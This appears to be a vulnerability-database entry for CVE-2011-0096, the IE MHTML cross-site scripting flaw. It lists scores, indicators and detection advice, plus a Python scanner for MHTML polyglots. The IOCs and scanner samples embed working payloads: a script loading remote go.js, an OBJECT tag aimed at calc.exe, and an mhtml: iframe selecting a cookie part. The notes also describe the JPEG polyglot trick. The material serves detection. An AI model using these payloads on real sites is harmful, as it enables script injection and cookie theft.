CVE-2011-0096
published 2011-01-31

CVE-2011-0096: The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2…

Priority: P2 (79)
CVSS 3.1: 6.1 medium (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Flags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 46.82% (98.7th percentile)
The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability."

Affected

1 range

Vendor    | Product             | Version range | Fixed in
microsoft | windows_server_2008 |               |

Detection & IOCs (extracted from sources)

url: http://www.80vul.com/hackgame/xs-g0.php?username=Administrator
url: http://www.80vul.com/hackgame/go.js
url: http://www.80vul.com/mhtml/word.doc
other: Content-Type: multipart/related; boundary="_boundary_by_mere"
other: Content-Location:cookie
other: Content-Transfer-Encoding:base64
domain: www.80vul.com
bytes (base64): PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
  decodes to: <body>\r\n<script src='http://www.80vul.com/hackgame/go.js'></script>\r\n</body>\r\n (the injected MHTML part that loads the remote script)
bytes (base64): PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
  decodes to: <OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111 CODEBASE=c:/windows/system32/calc.exe></OBJECT> (an OBJECT tag whose CODEBASE points at a local executable, used by the cross-zone variant)
  • Detect MHTML protocol handler abuse by monitoring for URLs or iframe src attributes beginning with 'mhtml:' in HTTP traffic or HTML content, which is the attack vector for this XSS vulnerability.
  • Detect MHTML MIME boundary injection by looking for HTTP responses or uploaded files containing 'Content-Type: multipart/related; boundary=' combined with 'Content-Location:' and 'Content-Transfer-Encoding:base64' headers embedded in non-MIME content types (e.g., image files, JSON).
  • Detect bypass of upload file format restrictions by inspecting files with image extensions (e.g., .jpg) for embedded MHTML MIME multipart headers, as attackers combine binary files with MHTML content using 'copy /b 1.jpg + 1.mhtml 2.jpg'.
  • Detect X-Frame-Options bypass attempts where mhtml: protocol is used as an iframe src, since X-Frame-Options does not protect the mhtml protocol handler.
  • Monitor for MHTML injection in JSON responses: attackers may inject MHTML MIME headers into JSON files to bypass Content-Type restrictions intended to prevent XSS.
  • Publicly available exploit code exists for CVE-2011-0096; monitor for exploitation attempts even though targeted attacks had not been observed in the wild at time of disclosure.
  • Double URL-encoding is required for exploitation on Windows XP and Windows Server 2003, whereas single encoding suffices on Windows 7.
  • The 'Microsoft Word JavaScript execution' attack chain (scenario 5/6) only works on Office 2003 and Office 2007; other versions require a different delivery method.
  • The Cross Zone Scripting variant (scenario 6), which combines MHTML with a file://uncpath reference and Word, was tested and confirmed on IE6/IE7/IE8 running on Windows 2000, Windows XP, and Windows Server 2003.
  • No patch was available at the time of initial disclosure; Microsoft issued only a security advisory with recommended workarounds, and the patch timeline was unknown. Microsoft later shipped the fix in security bulletin MS11-026 (April 2011).
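The detection notes above are string-level checks; the following Python script, added here as a worked example and not taken from any of the cited sources, implements them over constructed samples: a JPEG/MHTML polyglot of the kind produced by `copy /b`, a JSON document with the MHTML headers injected into a field, an HTML page that frames an mhtml: URL, and two benign controls. The two base64 blobs are the IOC bytes listed above, decoded so that the script and OBJECT payloads can be matched after extraction. The sample file names, the JSON field, and the `!cookie` part selector appended to the mhtml: URL are assumptions made for the example.

```python
import base64
import re
from typing import Dict, List, Tuple

# The two base64 IOC blobs listed on this page, decoded once at import time.
IOC_BASE64 = [
    "PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K",
    "PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==",
]
KNOWN_PAYLOADS = [base64.b64decode(b) for b in IOC_BASE64]

# Header shapes from the IOC list. The boundary may be bare, quoted, or
# backslash-escaped when it has been smuggled into a JSON string value.
BOUNDARY_RE = re.compile(rb'Content-Type:\s*multipart/related;\s*boundary=[\\"]*([^"\\\r\n;]+)', re.I)
CONTENT_LOCATION_RE = re.compile(rb"Content-Location:", re.I)
BASE64_CTE_RE = re.compile(rb"Content-Transfer-Encoding:\s*base64", re.I)
MHTML_SRC_RE = re.compile(rb"""(?:src|href)\s*=\s*["']?\s*mhtml:""", re.I)

# Content types that legitimately carry a multipart body. MHTML headers inside
# anything else (image, JSON, plain text) are the injection signature.
MIME_CAPABLE = {"message/rfc822", "multipart/related", "multipart/mixed"}


def decode_base64_parts(body: bytes, boundary: bytes) -> List[bytes]:
    """Decode every base64-encoded part delimited by the MHTML boundary."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if not BASE64_CTE_RE.search(chunk):
            continue
        blank = re.search(rb"\r?\n\r?\n", chunk)  # part headers end at the first blank line
        if not blank:
            continue
        raw = re.sub(rb"\s+", b"", chunk[blank.end():])
        try:
            parts.append(base64.b64decode(raw + b"=" * (-len(raw) % 4), validate=True))
        except ValueError:  # binascii.Error is a ValueError; not base64, skip it
            pass
    return parts


def scan(body: bytes, content_type: str) -> List[str]:
    """Tag one HTTP response body or uploaded file with MHTML-abuse findings."""
    findings: List[str] = []
    ct = content_type.split(";")[0].strip().lower()

    # 1. MHTML MIME headers embedded in a body that is not supposed to be MIME.
    m = BOUNDARY_RE.search(body)
    if m and ct not in MIME_CAPABLE and CONTENT_LOCATION_RE.search(body):
        findings.append("mhtml-headers-in-" + (ct or "unknown"))
        for part in decode_base64_parts(body, m.group(1)):
            if part in KNOWN_PAYLOADS:
                findings.append("known-ioc-payload")
            low = part.lower()
            if b"<script" in low:
                findings.append("decoded-part-script")
            if b"<object" in low and b"codebase=" in low:
                findings.append("decoded-part-object-codebase")

    # 2. mhtml: used as an iframe/object/link source, which X-Frame-Options does not cover.
    if MHTML_SRC_RE.search(body):
        findings.append("mhtml-scheme-src")
    return findings


def mhtml_block(inner_html: bytes, boundary: bytes = b"_boundary_by_mere") -> bytes:
    """Constructed MHTML fragment shaped like the IOC headers (example data, not a capture)."""
    return b"".join([
        b'Content-Type: multipart/related; boundary="', boundary, b'"\r\n\r\n',
        b"--", boundary, b"\r\n",
        b"Content-Location:cookie\r\n",
        b"Content-Transfer-Encoding:base64\r\n\r\n",
        base64.b64encode(inner_html), b"\r\n",
        b"--", boundary, b"--\r\n",
    ])


JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32  # minimal constructed JPEG prefix

# Constructed samples: (Content-Type, body). Names and the JSON field are assumptions.
SAMPLES: Dict[str, Tuple[str, bytes]] = {
    "polyglot.jpg": ("image/jpeg", JPEG_HEAD + b"\r\n" + mhtml_block(KNOWN_PAYLOADS[0])),
    "profile.json": ("application/json",
                     b'{"username":"Administrator","bio":"' + mhtml_block(KNOWN_PAYLOADS[1]) + b'"}'),
    "page.html": ("text/html",
                  b'<iframe src="mhtml:http://www.80vul.com/hackgame/xs-g0.php?username=Administrator!cookie"></iframe>'),
    "clean.jpg": ("image/jpeg", JPEG_HEAD),
    "clean.json": ("application/json", b'{"username":"Administrator","bio":"hello"}'),
}


def scan_all() -> Dict[str, List[str]]:
    """Run scan() over every constructed sample; used by the stand-alone run below."""
    return {name: scan(body, ct) for name, (ct, body) in SAMPLES.items()}


if __name__ == "__main__":
    for name, tags in scan_all().items():
        print(f"{name:14s} {tags or '-'}")
```

In production the input is each response body paired with its declared Content-Type, or each uploaded file paired with the type it was accepted as. The base64 decode step matters because the script tag and the OBJECT/CODEBASE payload never appear in clear text inside the polyglot, so a plain substring rule on `<script` misses exactly the cases this CVE is about.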

CVSS provenance

Source    | Version | Score      | Vector
nvd       | v3.1    | 6.1 MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvd       | v2.0    | 4.3 MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck |         | 6.1 MEDIUM |